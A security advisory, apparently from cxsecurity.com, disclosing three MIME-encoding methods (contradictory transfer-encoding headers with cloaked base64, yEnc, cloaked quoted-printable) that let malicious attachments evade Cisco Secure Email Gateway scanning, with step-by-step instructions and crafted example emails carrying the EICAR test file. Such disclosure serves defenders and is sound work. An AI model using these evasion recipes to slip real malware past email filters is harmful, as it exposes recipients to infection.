Cisco Secure Email Gateway Malware Detection Evasion

2022.11.15
Credit: Mallory
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

This report is being published within a coordinated disclosure procedure. The researcher has been in contact with the vendor but not received a satisfactory response within a given time frame. As the attack complexity is low and exploits have already been published by a third party there must be no further delay in making the threads publicly known. The researcher prefers not to take credit for their findings. Evading Malware Detection by Cisco Secure Email Gateways ======================================================== Cisco Secure Email Gateways, formerly known as Cisco Ironport Email Security Appliances, that are configured to detect malicious email attachments, can easily be circumvented. A remote attacker can leverage error tolerance and different MIME decoding capabilities of email clients, compared with the gateway, to evade detection of malicious payloads by anti-virus components on the gateway. Method 1: Cloaked Base 64 ------------------------- Step-by-step instruction: 1. Prepare an email with the malicious attachment with a commonplace email client or employing standard MIME encoding, using content-transfer-encoding base64. 2. Insert CR+LF line breaks at random places in the base64 encoded block so that the lines have different lengths, but in a way that groups of four base64 characters (encoding three bytes) stay together. This is intended to evade nave heuristics to detect base64 even out of context, while not violating the MIME standard. 3. Before the content-transfer-encoding header of the attachment, insert another contradictory header "Content-Transfer-Encoding: quoted-printable". This does violate the MIME standard. 4. Remove any content-length headers of the message, if present. A complete email prepared in this way may look like this: ----------------------- begin example ----------------------- From: Mallory <mallory@example.com> To: Alice <alice@example.com> Date: Mon, 27 Jun 2022 18:29:22 +0200 Subject: Your present Mime-Version: 1.0 Message-Id: <b31a762c.8b44.63b67b5a@example.com> Content-type: multipart/mixed; boundary=boundary_ef5dcd26 --boundary_ef5dcd26 Content-type: text/plain Content-Transfer-Encoding: quoted-printable Here is your present. --boundary_ef5dcd26 Content-type: application/octet-stream Content-Disposition: attachment; filename="present.zip" Content-Transfer-Encoding: quoted-printable Content-Transfer-Encoding: base64 UEsD BAoAAAAAAN2Q 21Q8z1FoRAAAAEQAAAAJABwAZWlj YXIuY29tVVQJAAOh [... more similar lines skipped ...] CwAB BPgDAAAE6QMAAFBLBQYAAAAAAQABAE8A AACHAAAAAAA= --boundary_ef5dcd26-- ----------------------- end example ----------------------- Emails prepared in this fashion will pass through affected gateways with a verdict of being clean from malware, even if the attachment is otherwise easily recognizable malware such as the Eicar test virus. Many popular email clients, on the other hand, will present the attached file and faithfully reproduce it upon saving. Affected systems: This exploit was successfully tested with a zip file containing the Eicar test virus and Cisco Secure Email Gateways with AsyncOS 14.2.0-620, 14.0.0-698, and others. Affected Email Clients were Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build 16.0.15726.20070) 64-bit, Mozilla Thunderbird 91.11.0 (64-bit), Vivaldi 5.5.2805.42 (64-bit), Mutt 2.1.4-1ubuntu1.1, and others. Method 2: yEnc Encoding ----------------------- yEncode or short yEnc is an encoding typically employed by usenet clients. Some email clients are capable of decoding MIME parts with this encoding, too. A remote attacker using this encoding for a malicious email attachment will evade malware detection by affected gateways but may succeed in delivering the payload to victims if they use particular email clients. Other email clients will store the attachment in an undecoded and thus not directly harmful form. An email prepared in this way may look like this: ----------------------- begin example ----------------------- From: Mallory <mallory@example.com> To: Alice <alice@example.com> Date: Mon, 27 Jun 2022 18:29:22 +0200 Subject: Your present Mime-Version: 1.0 Message-Id: <b31a762c.8b44.63b67b5a@example.com> Content-type: multipart/mixed; boundary=boundary_ef5dcd26 --boundary_ef5dcd26 Content-type: text/plain Content-Transfer-Encoding: quoted-printable Here is your present. --boundary_ef5dcd26 Content-type: application/octet-stream Content-Disposition: attachment; filename="present.zip" Content-Transfer-Encoding: x-yencode =ybegin line=128 size=236 name=file.bin [... binary content skipped ...] =yend size=236 --boundary_ef5dcd26-- ----------------------- end example ----------------------- Affected Systems: This exploit was successfully tested with a zip file containing the Eicar test virus and Cisco Secure Email Gateways with AsyncOS 14.2.0-620, 14.0.0-698, and others. An affected Email Client was Mozilla Thunderbird 91.11.0 (64-bit). Method 3: Cloaked Quoted-Printable ---------------------------------- This method is similar to method 1 with the roles of quoted-printable and base64 swapped. The payload has to be encoded quoted-printable, but with each byte rather than just non-printable bytes encoded and on separate lines with continuation. The contradicting headers now come in the order base64, quoted-printable. An email prepared in this way may look like this: ----------------------- begin example ----------------------- From: Mallory <mallory@example.com> To: Alice <alice@example.com> Date: Mon, 27 Jun 2022 18:29:22 +0200 Subject: Your present Mime-Version: 1.0 Message-Id: <b31a762c.8b44.63b67b5a@example.com> Content-type: multipart/mixed; boundary=boundary_ef5dcd26 --boundary_ef5dcd26 Content-type: text/plain Content-Transfer-Encoding: quoted-printable Here is your present. --boundary_ef5dcd26 Content-type: application/octet-stream Content-Disposition: attachment; filename="present.zip" Content-Transfer-Encoding: base64 Content-Transfer-Encoding: quoted-printable =50= =4B= =03= =04= [... more similar lines skipped ...] =00= =00= =00= =00= --boundary_ef5dcd26-- ----------------------- end example ----------------------- Affected Systems: This exploit was successfully tested with a zip file containing the Eicar test virus and Cisco Secure Email Gateways with AsyncOS 14.2.0-620, 14.0.0-698, and others. Affected Email Clients were Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1. References ---------- Code employing the methods presented here and many similar techniques to manipulate MIME encoding can be found on GitHub: https://github.com/noxxi/mime-is-broken Cisco has published an advisory with a workaround facilitating an undocumented feature of the gateway that can be used to block incorrect MIME. This mitigates many cases of the test suite from GitHub, but not all, particularly not the ones presented in this report. URL: https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwc34679 End of the report.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top